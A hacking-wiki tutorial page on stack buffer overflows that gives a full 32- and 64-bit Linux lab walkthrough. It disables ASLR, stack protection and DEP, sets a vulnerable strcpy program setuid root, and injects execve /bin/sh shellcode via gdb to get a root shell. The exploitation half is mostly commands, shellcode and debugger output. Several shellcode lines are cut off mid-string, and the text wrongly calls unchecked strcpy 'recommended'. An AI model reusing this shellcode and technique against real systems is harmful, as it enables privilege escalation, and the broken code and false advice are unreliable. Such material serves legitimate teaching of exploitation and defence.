Questions about this topic? Sign up to ask in the talk tab.

Buffer overflow

From Security101 - Blackhat Techniques - Hacking Tutorials - Vulnerability Research - Security Tools
(Redirected from Buffer Overflows)
Jump to: navigation, search

Buffer overflow, or Buffer Overrun is a software error triggered when a program does not adequately control the amount of data that is copied over the buffer, if this amount exceeds the preassigned capacity, remaining bytes are stored in adjacent memory areas by overwriting its original content. This can be exploited by overwriting a fuction's return address to cause arbitrary code execution and allow access to a vulnerable system.

c3el4.png This is an introductory article to buffer overflows. Bleeding Life is an example of a project containing buffer overflows that bypass ASLR and DEP for Windows 7.
Buffer overflow requires a basic understanding of assembly and machine code.

Special thanks to Teknical for his contributions to this article.



A computer receives input, recalls what to do with the input, and then does it. If an attacker on the internet could control the memory of a computer, the computer would remember the wrong thing to do, and execute it because it doesn't know any better. This is what happens during a buffer overflow attack.

The memory of a computer is much like a post office. Each piece of mail goes to a mailbox or a P.O. box, and each P.O. box can only hold one piece of mail at a time. Suppose for a moment that the post office that represents the computer's memory has 500 P.O. boxes. Boxes 1-200 are for data that the user sends into the computer, and boxes 201-500 hold instructions for what to do with that data. If a user sends in 300 pieces of data or mail, there are two scenarios: 1. A secure program would tell the user "I can only hold 200 pieces, I'm not taking any more mail". 2. An insecure program would simply take all the data into boxes 1-300.

In the insecure scenario, when the computer remembers what to do, it lands on P.O. box 201. If the user was an attacker, malicious instructions at P.O. box 201 would be executed! This is why the buffer overflow is such a dangerous vulnerability.
Notice: Though it is a dying attack vector, the buffer overflow is still very prominent today.

In all actuality, there is a return address that the computer uses to remember where its instructions are. So if an attacker filled up P.O. boxes 1-201, and 201 contained the return address, and the attacker changed the return address to P.O. box 1, the computer would execute the data instead of just keeping it in memory. This means that the attacker has to know enough about the system to know what address the malicious instructions are going to, because otherwise the attacker will not know the correct return address to put into P.O. Box 201. This means that the attacker has to have precise aim, or the attack will be unsuccessful.

Protip: Debuggers such as IDA Pro, kgdb, gdb, and ollydbg are very helpful for finding the correct return pointer for the shellcode.



There are multiple defenses that have been incorporated into runtime in an attempt to fight buffer overflows and prevent them from taking place. One of the most recent defense mechanisms is called ASLR, which stands for Address Space Layout Randomization. It makes it so every time the computer reboots and every time a program runs, the address space that it lives in changes. In other words, following the mailbox analogy, the return address will never be in the same mailbox. The point of this is to try to prevent an attacker from performing a buffer overflow exploit because the attacker can never aim properly. Unfortunately, attackers have discovered something called "Magic Numbers", which tricks the error handler for programs and allows an attacker to aim his attack correctly without having to know a return address. Some key failures of ASLR include that certain Operating Systems (such as Windows 7) dynamically disable it for non-compatible libraries.


Another defense mechanism that has been implemented is called DEP, which stands for Data Execution Prevention. This is an attempt to prevent the return address from being changed into something in the same memory space as the data, and also prevent machine code (the code that buffer overflows are crafted in) from being placed into data segments. Return_Oriented_Programming_(ROP) is used when defeating modern DEP.

To combat additional filters, attackers have developed polymorphic and multi-architecture alphanumeric shellcode and polymorphic ASCII machine code and shellcodes. ASCII and Polymorphic ASCII code looks to many filters like normal user input instead of malicious binary or machine code.


An even further defense mechanism is called a container, which is another layer of Data Execution Prevention. The container attempts to identify all possible results of code from data within the buffer (or the data segment) and then prevent the application from calling external functions in shared objects from the inside of the buffer. A version of this has been implemented in Cisco Security Agent, or CSA. Linux's GrSec and PaX kernel patches also implement their own version of contained memory space.
Notice: As attacks become more and more sophisticated, so do hardware and software prevention mechanisms. Notice something outdated? Visit our IRC and tell us about it!

Bypassing protections

So with CSA, ASLR, and Operating-System supplied DEP, successfully performing a buffer overflow exploit against a system can be extremely difficult. Any attacker who makes it to the point where CSA catches it is already very advanced. To successfully subvert ASLR, DEP and containers one must use polymorphic ASCII shellcode and return-oriented programming. Return-oriented programming is used to evade the NX bit and XD bits, a type of hardware DEP implemented directly into processors. Machine code that self-modifies as well as looks like standard user input and has all of its own functions built into its own code, in a return-oriented fashion, is required to bypass modern-day host level buffer overflow defense standards. The return address must always be specified in normal hexadecimal format, so it will usually look like some really funny characters, like squares or like strange symbols. The IDS or HIDS Context Buffer will show four squares or symbols on the end in a real buffer overflow exploit attempt on 32-bit systems, and eight squares or symbols on the end on a 64-bit system.

c3el4.png Learning to count in hex and bitwise math will tell you more about the sizes.

Maximum effectiveness

Many times firewall rules will prevent any connections outgoing from a server machine and prevent all incoming connections except for connections on the specified server port. Because of this, attackers use what is called Second Stage Shellcode to first find the connection that the exploit originated from, and then send the output of the arbitrary functions back along the first connection. This is done to circumvent firewalls and prevent a firewall from blocking a connection.

Buffer overflows can be used remotely to gain partial or total systems access, or they can be used locally to escalate privileges and permissions segments inside of the operating system in order to gain system or root level access. The real threat that a buffer overflow causes is what is called the "Zero-Day attack", also known as a buffer overflow that the security world has never seen before. Zero-Day or 0day attacks are the most devastating to the security industry, causing worms, viruses, and sometimes even hundreds of thousands of systems to be compromised in a single day.


Buffer overflows exist because a combination of insecure language compilers, insecure programmers and bad cpu architectures that keep return address from a function call in the stack. A programmer should be able to check input to the data segment with relative ease, however often times coders are either ignorant of the problem, overlook the flaw, or sometimes even a disgruntled employee might code the vulnerability into an application himself for his own personal gain after the application goes to production.

Protip: Bench-marking and pen-testing software in an as-you-develop fashion for proper quality assurance and control can help prevent attacks from a malicious insider.


Notice: This example is for a 32 bit Linux operating system and the steps below may vary per your distribution and installation.

Disabling ASLR

The first step is to disable ASLR. This allows the featured proof of concept to be successful. There are other methods of bypassing ASLR, but will not be covered here.

 teknical@teknical-vm:~$ sudo -s
 [sudo] password for teknical: 
 root@teknical-vm:~# echo 0 > /proc/sys/kernel/randomize_va_space
 root@teknical-vm:~# exit

Test application

The test application is below. Note that there is a statically allocated buffer of 100 bytes. This is what will be overflowed. The use of strcpy on an unchecked buffer is a common procedure. Its use is recommended to prevent applications from being exploited.


  #include <stdlib.h>
  #include <stdio.h>
  #include <string.h>
  int main(int argc, char *argv[]){
  	char buffer[100];
  	strcpy(buffer,  argv[1]);
  	return 0;


For compilation, use the -g option of gcc to include debugging symbols in the linker, resulting in easier code execution.

 teknical@teknical-vm:~$ gcc -g bof.c -o bof

Following compilation, the vulnerability can then be triggered. This example has a buffer of 100 bytes, thus a good test is 104 bytes, which will result in an overflow. Ruby is used to dynamically build a 104 byte string with perl another option.

Potential compile-time protections
 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
 *** stack smashing detected ***: ./bof terminated
Teknical says
By default on newer versions of gcc and other modern compilers, code is sanitized and protected at compile time.
Solution for test application

The test application must be compiled without this sanitation. Removing the stack protection from program is done by the utilization of -fno-stack-protector option with gcc.

 teknical@teknical-vm:~$ gcc -g -fno-stack-protector bof.c -o bof


Setuid binary is used for this example to ensure the retrieval of a root shell. Set up the bof binary for setuid below:

 teknical@teknical-vm:~$ sudo chown root:root ./bof
 teknical@teknical-vm:~$ sudo chmod 4755 ./bof

On x86

Following the compilation of the application, the vulnerability can be triggered once again. As stated earlier, 104 bytes are used and this is increased until the vulnerability is triggered.

 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*108'`
 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*112'`
 Segmentation fault

Note that it took 112 bytes to successfully overwrite the saved ebp of the running application. The system is now prepared for attempts of exploitation. Note, that 116 bytes are required to overwrite the return address on the stack.

Notice: These extra bytes are other registers and sometimes special registers. These are also overwritten.

On x86-64

This number will vary on x86-64...

 xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 100'`
 xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 110'`
 xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 120'`
 Segmentation fault
 xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 119'`

On x86-64 it takes 120 bytes to trigger a segfault. Another important difference is that the return address will be placed in the 8 byte rip register, not the 4 byte eip register.

Disabling DEP

DEP is another protection scheme which prevents code in the stack from being executed. 'execstack' is used to check the status of and set the binary to have an executable stack.

Xochipilli says
Gcc's `-z execstack' parameter can be used to set the stack as executable at compile time

The -q option will query the current status.

 teknical@teknical-vm:~$ sudo execstack -q bof
 - bof

Notice the -, which means that the application will NOT have an executable stack. This will prevent successful exploitation.

The -s option is used to set the binary to allow execution on the stack.

 teknical@teknical-vm:~$ sudo execstack -s bof

If queried again, an X will appear in its place, which means that the stack is now executable.

 teknical@teknical-vm:~$ sudo execstack -q bof
 X bof


Notice: gdb is required for the following sections, installed using the package manager

The next step is to start up gdb and begin debugging.

Shellcode analysis

c3el4.png Shellcode is machine code for a flat binary execution during exploitation of a buffer overflow exploit.
On x86

The following will be used as the argument to the test application:

 `ruby -e 'print "\x90"*60,
 \xff\xff/bin/sh", "A"*7,
There are a few things to be noted examining the shellcode above.
Notice: The backticks are bash command substitution as described in the bash book.
The shell code used is 45 bytes long. It is a setuid() + /bin/sh shellcode:

Following previous knowledge that at least 112 bytes are required to overwrite ebp, and another 4 to overwrite the return address. The shellcode is padded with 60 NOPs. 60 + 45 = 105. It is also known that 7 bytes are required to overwrite ebp and another 4 to overwrite the return address. 0x41/'A' is recommended for this portion because it easier to debug with. Another 7 bytes of 'A', are added and then 4 on the end for the return address. 60 + 45 + 7 + 4 = 116, which is the number of bytes needed to overwrite the return address and successfully exploit the target.

On x86-64

The following shellcode is used to spawn a shell:

 "\x48\x31\xd2"                                  // xor    %rdx, %rdx
 "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"      // mov    $0x68732f6e69622f2f, %rbx
 "\x48\xc1\xeb\x08"                              // shr    $0x8, %rbx
 "\x53"                                          // push   %rbx
 "\x48\x89\xe7"                                  // mov    %rsp, %rdi
 "\x50"                                          // push   %rax
 "\x57"                                          // push   %rdi
 "\x48\x89\xe6"                                  // mov    %rsp, %rsi
 "\xb0\x3b"                                      // mov    $0x3b, %al
 "\x0f\x05";                                     // syscall



This shellcode is 30 bytes long. 120 bytes + 8 bytes are required for the return address. To start, use a 60 byte nopsled + 30 byte shellcode + 30 bytes of padding + 8 byte return address, totaling 128 bytes.

Finding the return address

  • Starting gdb
 teknical@teknical-vm:~$ gdb -q ./bof
 Reading symbols from /home/teknical/bof...done.
  • Setting a breakpoint inside of the "main" function
 (gdb) break main
 Breakpoint 1 at 0x80483ed: file bof.c, line 7.
  • Starting the application with the command line as discussed above.
On x86
 (gdb) r `ruby -e 'print "\x90"*60, "[insert our shellcode here]", "A"*7, "\x41\x41\x41\x41"'`
 Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60, 
 \x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'`
 Breakpoint 1, main (argc=2, argv=0xbffff474) at bof.c:7
 7		strcpy(buffer,  argv[1]);
Teknical says
Viewing the main function, lets examine the stack. It is known that at least 116 bytes on the stack are required, 200 bytes are used to make sure all the required space is present. Another thing to look for is the address of the shell code on the stack.
 (gdb) x/200x $esp
 0xbffff340:	0x00119222	0xbffff3e4	0x080481f4	0xbffff3d8
 0xbffff350:	0x0012ca54	0x00000000	0x0012fb48	0x00000001
 0xbffff360:	0x00000000	0x00000001	0x0012c8f8	0x00293ff4
 0xbffff370:	0x00242d19	0x0016d2a5	0xbffff388	0x001549d5
 0xbffff380:	0x00293ff4	0x08049ff4	0xbffff398	0x080482e8
 0xbffff390:	0x0011e030	0x08049ff4	0xbffff3c8	0x08048439
 0xbffff3a0:	0x00294324	0x00293ff4	0x08048420	0xbffff3c8
 0xbffff3b0:	0x0016d4a5	0x0011e030	0x0804842b	0x00293ff4
 0xbffff3c0:	0x08048420	0x00000000	0xbffff448	0x00154bd6
 0xbffff3d0:	0x00000002	0xbffff474	0xbffff480	0x0012f858
 0xbffff3e0:	0xbffff430	0xffffffff	0x0012bff4	0x08048245
 0xbffff3f0:	0x00000001	0xbffff430	0x0011d626	0x0012cab0
 0xbffff400:	0x0012fb48	0x00293ff4	0x00000000	0x00000000
 0xbffff410:	0xbffff448	0xee66f487	0x3b1663f8	0x00000000
 0xbffff420:	0x00000000	0x00000000	0x00000002	0x08048330
 0xbffff430:	0x00000000	0x00123230	0x00154afb	0x0012bff4
 0xbffff440:	0x00000002	0x08048330	0x00000000	0x08048351
 0xbffff450:	0x080483e4	0x00000002	0xbffff474	0x08048420
 0xbffff460:	0x08048410	0x0011e030	0xbffff46c	0x0012c8f8
 0xbffff470:	0x00000002	0xbffff5e4	0xbffff5f7	0x00000000
 0xbffff480:	0xbffff66c	0xbffff690	0xbffff6a3	0xbffff6b3
 0xbffff490:	0xbffff6be	0xbffff70f	0xbffff721	0xbffff74b
 0xbffff4a0:	0xbffff76b	0xbffff779	0xbffffc1a	0xbffffc40
 0xbffff4b0:	0xbffffc52	0xbffffcae	0xbffffce0	0xbffffceb
 0xbffff4c0:	0xbffffd17	0xbffffd64	0xbffffd7a	0xbffffd89
 0xbffff4d0:	0xbffffd9c	0xbffffdb3	0xbffffdca	0xbffffdda
 0xbffff4e0:	0xbffffdee	0xbffffe23	0xbffffe2c	0xbffffe3d
 0xbffff4f0:	0xbffffe4f	0xbffffe63	0xbffffe6b	0xbffffe97
 0xbffff500:	0xbffffea8	0xbfffff0a	0xbfffff47	0xbfffff67
 0xbffff510:	0xbfffff74	0xbfffff96	0xbfffffaf	0x00000000
 0xbffff520:	0x00000020	0x0012d420	0x00000021	0x0012d000
 0xbffff530:	0x00000010	0x078bf3ff	0x00000006	0x00001000
 0xbffff540:	0x00000011	0x00000064	0x00000003	0x08048034
 0xbffff550:	0x00000004	0x00000020	0x00000005	0x00000008
 0xbffff560:	0x00000007	0x00110000	0x00000008	0x00000000
 0xbffff570:	0x00000009	0x08048330	0x0000000b	0x000003e8
 0xbffff580:	0x0000000c	0x000003e8	0x0000000d	0x000003e8
 0xbffff590:	0x0000000e	0x000003e8	0x00000017	0x00000001
 0xbffff5a0:	0x00000019	0xbffff5cb	0x0000001f	0xbfffffe9
 0xbffff5b0:	0x0000000f	0xbffff5db	0x00000000	0x00000000
 0xbffff5c0:	0x00000000	0x00000000	0x85000000	0xaaec0f53
 0xbffff5d0:	0xb8fc08c0	0xd3d76e6a	0x693bf638	0x00363836
 0xbffff5e0:	0x00000000	0x6d6f682f	0x65742f65	0x63696e6b
 0xbffff5f0:	0x622f6c61	0x9000666f	0x90909090	0x90909090
 0xbffff600:	0x90909090	0x90909090	0x90909090	0x90909090
 0xbffff610:	0x90909090	0x90909090	0x90909090	0x90909090
 0xbffff620:	0x90909090	0x90909090	0x90909090	0x90909090
 0xbffff630:	0xeb909090	0x76895e1f	0x88c03108	0x46890746
 0xbffff640:	0x890bb00c	0x084e8df3	0xcd0c568d	0x89db3180
 0xbffff650:	0x80cd40d8	0xffffdce8	0x69622fff	0x68732f6e

The next step is to find the shellcode on the stack. The easiest thing to do here is to look for the NOPs. The address of the NOPs is required so this can be used as the return address on the stack. This will cause execution to resume with the shell code once the function returns.

Protip: Advanced attacks include ascii shellcode for maximum evasion.

Note the NOPS above starting at 0xbffff5f8. 0xbffff610 will be used since it is a cleaner address. This can be arranged in little endian format: "\x10\xf6\xff\xbf"

On x86-64
 (gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68
 \x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05", "A" x 30, "\x41\x41
 Starting program: /home/xo/filez/bof/bof `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb
 \x0f\x05", "A" x 30, "\x41\x41\x41\x41\x41\x41\x41\x41"'`
 (gdb) x/400x $rsp
Xochipilli says
I truncated this cause it was huge
 0x7fffffffe510:	0x00000064	0x00000000	0x00000003	0x00000000
 0x7fffffffe520:	0x00400040	0x00000000	0x00000004	0x00000000
 0x7fffffffe530:	0x00000038	0x00000000	0x00000005	0x00000000
 0x7fffffffe540:	0x00000008	0x00000000	0x00000007	0x00000000
 0x7fffffffe550:	0xf7ddd000	0x00007fff	0x00000008	0x00000000
 0x7fffffffe560:	0x00000000	0x00000000	0x00000009	0x00000000
 0x7fffffffe570:	0x00400400	0x00000000	0x0000000b	0x00000000
 0x7fffffffe580:	0x000003e8	0x00000000	0x0000000c	0x00000000
 0x7fffffffe590:	0x000003e8	0x00000000	0x0000000d	0x00000000
 0x7fffffffe5a0:	0x000003e8	0x00000000	0x0000000e	0x00000000
 0x7fffffffe5b0:	0x000003e8	0x00000000	0x00000017	0x00000000
 0x7fffffffe5c0:	0x00000000	0x00000000	0x00000019	0x00000000
 0x7fffffffe5d0:	0xffffe609	0x00007fff	0x0000001f	0x00000000
 0x7fffffffe5e0:	0xffffefe1	0x00007fff	0x0000000f	0x00000000
 0x7fffffffe5f0:	0xffffe619	0x00007fff	0x00000000	0x00000000
 0x7fffffffe600:	0x00000000	0x00000000	0xcc45c200	0xf80e704b
 0x7fffffffe610:	0xd5660936	0xff5959b5	0x36387878	0x0034365f
 0x7fffffffe620:	0x00000000	0x00000000	0x6d6f682f	0x6f782f65
 0x7fffffffe630:	0x6c69662f	0x622f7a65	0x622f666f	0x9000666f
 0x7fffffffe640:	0x90909090	0x90909090	0x90909090	0x90909090
 0x7fffffffe650:	0x90909090	0x90909090	0x90909090	0x90909090
 0x7fffffffe660:	0x90909090	0x90909090	0x90909090	0x90909090
 0x7fffffffe670:	0x90909090	0x90909090	0x48909090	0xbb48d231

Note the nopsled begins at 0x7fffffffe640, thus placed into rsp. Converted to little endian and formatted appropriately, this is \x40\xe6\xff\xff\xff\x7f\x00\x00.


Following the clearance of the breakpoint, restart the application with the same command line argument, but replace the "\x41\x41\x41x\x41" at the end of the argument with the return address of "\x10\xf6\xff\xbf"

 (gdb) clear main
 Deleted breakpoint 1 
On x86
 (gdb) r `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46
 \xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x10\xf6\xff\xbf"'`
 The program being debugged has been started already.
 Start it from the beginning? (y or n) y
 Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60,"\xeb\x1f\x5e
 "A"*7, "\x10\xf6\xff\xbf"'`
 process 2262 is executing new program: /bin/sh
 # whoami
On x86-64
 (gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e
 \x05", "A" x 30, "\x40\xe6\xff\xff\xff\x7f\x00\x00"'`
 Starting program: /home/xo/filez/bof/bof `perl -e 'print "\x90" x 60, "\x48\x31
 \x57\x48\x89\xe6\xb0\x3b\x0f\x05", "A" x 30, "\x40\xe6\xff\xff\xff\x7f\x00\x00"'`
 process 27319 is executing new program: /bin/dash
 $ whoami
Xochipilli says
The x86-64 shellcode used in this example does not call setuid() so it will execute at the privileges of the exploited application

YAY! Successful exploitation has occured.

Protip: If for some reason the exploitation was not successful, you could attempt a different return address.

Buffer overflow is part of a series on exploitation.
[ CrackMe ]
Personal tools

VPS-Heaven now accepting BitCoin!

Our research is made possible by your support.